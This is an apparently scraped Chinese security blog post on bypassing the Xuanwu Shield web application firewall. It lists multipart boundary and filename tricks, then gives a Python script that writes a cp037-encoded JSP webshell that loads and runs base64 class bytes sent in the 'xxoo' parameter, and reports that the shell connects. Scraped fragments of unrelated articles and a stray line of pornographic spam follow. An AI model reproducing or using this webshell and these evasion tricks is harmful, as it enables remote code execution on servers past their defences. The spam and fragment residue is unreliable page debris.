<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    玄武盾的幾種繞過姿勢

    VSole2022-12-28 13:51:12

    0x01 文件名繞過

    boundary等號前后空格繞過

    Content-Type: multipart/form-data;
    boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3
    

    boundary等號前后ascii碼09繞過

    Cp037編碼繞過

    文件名后加/繞過

    畸形請求方法

    0x02 文件內容繞過

    unicode編碼

    cp037編碼(腳本內置馬支持后綴jsp/jspx,都可解析)

    編碼腳本

    #python2
    data = '''"1.0"
     encoding=
    "cp037"
    ?>"http://java.sun.com/JSP/Page"
     version=
    "1.2"
    >  
        class PERFORM extends ClassLoader {
          PERFORM(ClassLoader c) { super(c);}
          public Class bookkeeping(byte[] b) {
            return super.defineClass(b, 0, b.length);
          }
        }
        public byte[] branch(String str) throws Exception {
          Class base64;
          byte[] value = null;
          try {
            base64=Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
          } catch (Exception e) {
            try {
              base64=Class.forName("java.util.Base64");
              Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
              value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
            } catch (Exception ee) {}
          }
          return value;
        }
      
      
        String cls = request.getParameter("xxoo");
        if (cls != null) {
          new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response});
        }
      
    '''
    fcp037 = open('cp037.jsp','wb')
    fcp037.write(data.encode('cp037'))
    

    生成出來,burp選擇paste from file

    可以正常連接

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 文件名繞過boundary等號前后空格繞過Content-Type: multipart/form-data;boundary等號前后ascii碼09繞過Cp037編碼繞過文件名后加/繞過畸形請求方法0x02 文件內容繞過unicode編碼cp037編碼編碼腳本#python2
    WAF簡介 WAF對于一些常規漏洞(如注入漏洞、XSS漏洞、命令執行漏洞、文件包含漏洞)檢測大多是基于“正則表達式”和“AI+規則”方法,因此會有一定概率繞過其防御。繞過waf測試中,有很多方法可以使用,以下常用方法:
    WAF簡介WAF對于一些常規漏洞檢測大多是基于“正則表達式”和“AI+規則”方法,因此會有一定概率繞過其防御。繞過waf測試中,有很多方法可以使用,以下常用方法:大小寫繞過
    編者按: 關于企業上市全過程中數據安全、網絡安全和個人信息保護方面監管重點、風險和應對,DPO社群中很多同仁發表過一些文章: 企業上市過程面臨數據合規問題和相關風險:境外篇 2021版(DPO社群成員觀點) 從墨跡IPO被否看擬境內上市企業數據合規工作(DPO社群成員觀點) 企業上市過程面臨數據合規問題和相關風險:境外篇(DPO社群成員觀點) 企業上市過程面臨數據合規問題和相關風
    此前,本公號發表過關于數據要素治理相關文章包括: 《非個人數據在歐盟境內自由流動框架條例》全文中文翻譯(DPO沙龍出品) 簡析歐盟《數字市場法》關于數據方面規定 數據流通障礙初探——以四個場景為例 對“數據共享合法化”分析與思考系列之一:以《關于歐洲企業間數據共享研究》為起點 對“數據共享合法化”分析與思考 系列之二 ——歐盟B2B數據共享案例研究 對“數據共享合法化”分析與思考
    2021年剛剛過半,勒索病毒爆發量已超過去年全年總和。7月19日,厄瓜多爾最大國營電信公司被勒索,導致運營出現大面積故障,勒索病毒再次出現在公眾面前。就連最近備受關注日本東京奧運會,其奧委會稱在去年4月時候也曾遭網絡攻擊,導致無法訪問。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类